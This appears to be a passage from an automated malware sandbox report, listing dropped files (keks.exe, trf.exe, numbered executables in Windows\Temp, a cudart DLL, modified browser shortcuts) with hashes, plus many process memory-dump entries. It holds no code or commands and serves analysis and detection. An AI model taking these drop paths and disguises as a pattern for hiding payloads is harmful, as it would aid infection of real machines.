bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixeuih4c.4q5.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3062789476-783164490-2318012559-1000\76b53b3ec448f7ccdda2063b15d2bfc3_0c7f3946-7653-4b87-8d45-55ff4293dffb
Filesize
2KB

MD5
6df0b3dc0898ff3040fe02ab43be4794

SHA1
315c7c123a2b890c0b200af3697ba6bacc08260c

SHA256
ca2adba8efa28c8b15ce3e6c0b224d0bb9325f4723fb13053a8970ad2bb01227

SHA512
067ca04e53203cb949b72cb2d996585d5b5a86fa7d7eb57c29e1b76d1eed0db6e738195ee34c790ba693a194250692d4794aeb4b6bfb5792e7b7b5551c6fae36

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
Filesize
304KB

MD5
0c582da789c91878ab2f1b12d7461496

SHA1
238bd2408f484dd13113889792d6e46d6b41c5ba

SHA256
a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67

SHA512
a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
Filesize
750KB

MD5
20ae0bb07ba77cb3748aa63b6eb51afb

SHA1
87c468dc8f3d90a63833d36e4c900fa88d505c6d

SHA256
daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d

SHA512
db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
Filesize
2KB

MD5
5463d378d354b63b144b060c988149c6

SHA1
ef703dfd37cbc4eb02a71a89ecfa447480fbb7ef

SHA256
37bb82e741b399ce8928c485bacb72be2b043aafcb995555afbd96fa51c2f2e1

SHA512
d3b7f86ffa4aaeea9f92641876fa799f02811dc6094b8ae02e28368052066d9b03d113d7398e1713eb41ae6a0de74d881ef49f3c02eece0db54234689a719d7e

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
Filesize
2KB

MD5
40fa25506cc8d5b16fcde6f5cccdf292

SHA1
a67a2fc027f3c1cae91f0b46991055a57cf0e1c1

SHA256
c709a8ec2e8ec8873d3a7a1873fe739c2db89e7fe96d7f13fa5ddfae6f00bf7e

SHA512
ac28c03dd09b43e8e2e5b604b992b0967b9e71ebe9a9afb85826433ef0a6350cb070d7731ca69c980199c443c655782d4a4a9aeb1a46cb153a4593e96ff6a581

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk
Filesize
2KB

MD5
48073ac6d405913994030192285e989a

SHA1
ebf54c57db8356cef314928fc8d48516acf8019b

SHA256
dbc1a4dad0687def8c3f7e6d0b95cbfbf8fc1f681b17d6b04f4949aa1a56946c

SHA512
0e28f8313dd568b1f24f8a11c0465a6885048503ad460f933b59feddb62e6f254df3d8e077c8e336ebc5a387520313cecd19917f2045670c970151cd763ec1cb

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk
Filesize
2KB

MD5
066c5d317f4792dfcd61df2c2dc259a7

SHA1
6bc09a24d00527ad666da1555c65f56bfea59b09

SHA256
bd5ebf265dad577bed2fcc13c904ef23e60aaf3e60fbc1e1b6bbf7546b8b2d82

SHA512
49a26fcce61783bb4c3907276d93b3b43424abf809322e1323e00dd414c6b6ee13096763ad5c3bc0715770cd232a1e9ffe40da9da8fdb88b2b6d1b1037cd7232

Download Submit
C:\Windows\Temp\567679.exe
Filesize
2.0MB

MD5
5c9e996ee95437c15b8d312932e72529

SHA1
eb174c76a8759f4b85765fa24d751846f4a2d2ef

SHA256
0eecdbfabaaef36f497e944a6ceb468d01824f3ae6457b4ae4b3ac8e95eebb55

SHA512
935102aad64da7eeb3e4b172488b3a0395298d480f885ecedc5d8325f0a9eabeea8ba1ece512753ac170a03016c80ba4990786ab608b4de0b11e6343fbf2192b

Download Submit
C:\Windows\Temp\639191.exe
Filesize
6.0MB

MD5
5cdb390aaba8caad929f5891f86cf8d7

SHA1
324a43fa56dffe541c0414f253faf2bf34ad9fa4

SHA256
1dfe2dd5f1bd757e852a271e0dc34f96aa9418983e9c8aded545302d2d69de44

SHA512
9e8dab07b840d9b0949a539e70cfa155ad08b34c73ae7f2810909f4bf5e1ddcee79f9630a9422083d244322d1afd9d91ade9fc4d75324bc4e45ee67a4900bbe9

Download Submit
C:\Windows\Temp\cudart64_101.dll
Filesize
398KB

MD5
1d7955354884a9058e89bb8ea34415c9

SHA1
62c046984afd51877ecadad1eca209fda74c8cb1

SHA256
111f216aef35f45086888c3f0a30bb9ab48e2b333daeddafd3a76be037a22a6e

SHA512
7eb8739841c476cda3cf4c8220998bc8c435c04a89c4bbef27b8f3b904762dede224552b4204d35935562aa73f258c4e0ddb69d065f732cb06cc357796cdd1b2

Download Submit
memory/236-225-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/236-223-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/248-390-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/248-394-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/248-397-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/248-392-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/248-393-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/248-391-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/556-224-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/1140-434-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/1140-436-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/1264-0-0x0000000000170000-0x000000000061A000-memory.dmp

Filesize
4.7MB

Download
memory/1264-2-0x0000000000171000-0x000000000019F000-memory.dmp

Filesize
184KB

Download
memory/1264-3-0x0000000000170000-0x000000000061A000-memory.dmp

Filesize
4.7MB

Download
memory/1264-5-0x0000000000170000-0x000000000061A000-memory.dmp

Filesize
4.7MB

Download
memory/1264-17-0x0000000000170000-0x000000000061A000-memory.dmp

Filesize
4.7MB

Download
memory/1264-1-0x00000000777A6000-0x00000000777A8000-memory.dmp

Filesize
8KB

Download
memory/1956-422-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/1956-424-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/2020-97-0x00000000013C0000-0x00000000013C1000-memory.dmp

Filesize
4KB

Download
memory/2020-80-0x00000000013C0000-0x00000000013C1000-memory.dmp

Filesize
4KB

Download
memory/2264-38-0x000000000055B000-0x000000000055C000-memory.dmp

Filesize
4KB

Download
memory/2504-381-0x0000019CFF670000-0x0000019CFF67A000-memory.dmp

Filesize
40KB

Download
memory/2504-382-0x0000019CFFA80000-0x0000019CFFA9C000-memory.dmp

Filesize
112KB

Download
memory/2504-387-0x0000019CFFAB0000-0x0000019CFFABA000-memory.dmp

Filesize
40KB

Download
memory/2504-379-0x0000019CFF880000-0x0000019CFF89C000-memory.dmp

Filesize
112KB

Download
memory/2504-384-0x0000019CFFAC0000-0x0000019CFFADA000-memory.dmp

Filesize
104KB

Download
memory/2504-380-0x0000019CFF8A0000-0x0000019CFF953000-memory.dmp

Filesize
716KB

Download
memory/2504-383-0x0000019CFFA60000-0x0000019CFFA6A000-memory.dmp

Filesize
40KB

Download
memory/2504-386-0x0000019CFFAA0000-0x0000019CFFAA6000-memory.dmp

Filesize
24KB

Download
memory/2504-385-0x0000019CFFA70000-0x0000019CFFA78000-memory.dmp

Filesize
32KB

Download
memory/2804-105-0x00000000066C0000-0x00000000066D2000-memory.dmp

Filesize
72KB

Download
memory/2804-215-0x0000000007350000-0x00000000073A0000-memory.dmp

Filesize
320KB

Download
memory/2804-74-0x00000000006C0000-0x0000000000712000-memory.dmp

Filesize
328KB

Download
memory/2804-75-0x0000000005620000-0x0000000005BC6000-memory.dmp

Filesize
5.6MB

Download
memory/2804-76-0x0000000005110000-0x00000000051A2000-memory.dmp

Filesize
584KB

Download
memory/2804-79-0x00000000050B0000-0x00000000050BA000-memory.dmp

Filesize
40KB

Download
memory/2804-99-0x0000000005BD0000-0x0000000005C46000-memory.dmp

Filesize
472KB

Download
memory/2804-100-0x00000000063B0000-0x00000000063CE000-memory.dmp

Filesize
120KB

Download
memory/2804-103-0x0000000006C30000-0x0000000007248000-memory.dmp

Filesize
6.1MB

Download
memory/2804-104-0x0000000006780000-0x000000000688A000-memory.dmp

Filesize
1.0MB

Download
memory/2804-106-0x0000000006720000-0x000000000675C000-memory.dmp

Filesize
240KB

Download
memory/2804-107-0x0000000006890000-0x00000000068DC000-memory.dmp

Filesize
304KB

Download
memory/2804-195-0x00000000069E0000-0x0000000006A46000-memory.dmp

Filesize
408KB

Download
memory/3096-342-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-427-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-18-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-332-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-19-0x0000000000761000-0x000000000078F000-memory.dmp

Filesize
184KB

Download
memory/3096-343-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-411-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-414-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-348-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-433-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-415-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-419-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-21-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-20-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-425-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-426-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-428-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-429-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3096-230-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/3168-344-0x0000000008F60000-0x0000000009122000-memory.dmp

Filesize
1.8MB

Download
memory/3168-345-0x0000000009660000-0x0000000009B8C000-memory.dmp

Filesize
5.2MB

Download
memory/3168-126-0x0000000000BC0000-0x0000000000C12000-memory.dmp

Filesize
328KB

Download
memory/3216-310-0x000001D30C290000-0x000001D30C2B0000-memory.dmp

Filesize
128KB

Download
memory/3460-232-0x000000001E760000-0x000000001EC88000-memory.dmp

Filesize
5.2MB

Download
memory/3460-221-0x000000001B360000-0x000000001B39C000-memory.dmp

Filesize
240KB

Download
memory/3460-226-0x000000001C140000-0x000000001C1B6000-memory.dmp

Filesize
472KB

Download
memory/3460-220-0x000000001B1F0000-0x000000001B202000-memory.dmp

Filesize
72KB

Download
memory/3460-81-0x0000000000220000-0x00000000002E0000-memory.dmp

Filesize
768KB

Download
memory/3460-219-0x000000001D580000-0x000000001D68A000-memory.dmp

Filesize
1.0MB

Download
memory/3460-231-0x000000001E060000-0x000000001E222000-memory.dmp

Filesize
1.8MB

Download
memory/3460-227-0x000000001B340000-0x000000001B35E000-memory.dmp

Filesize
120KB

Download
memory/3908-37-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/4136-407-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-398-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-402-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-400-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-404-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-401-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-399-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-412-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-413-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-403-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-406-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-408-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-409-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4136-410-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4156-253-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4156-251-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4420-252-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/4688-357-0x0000027CBBDB0000-0x0000027CBBDD2000-memory.dmp

Filesize
136KB

Download
memory/4988-96-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/4988-98-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/5064-334-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download
memory/5064-339-0x0000000000760000-0x0000000000C0A000-memory.dmp

Filesize
4.7MB

Download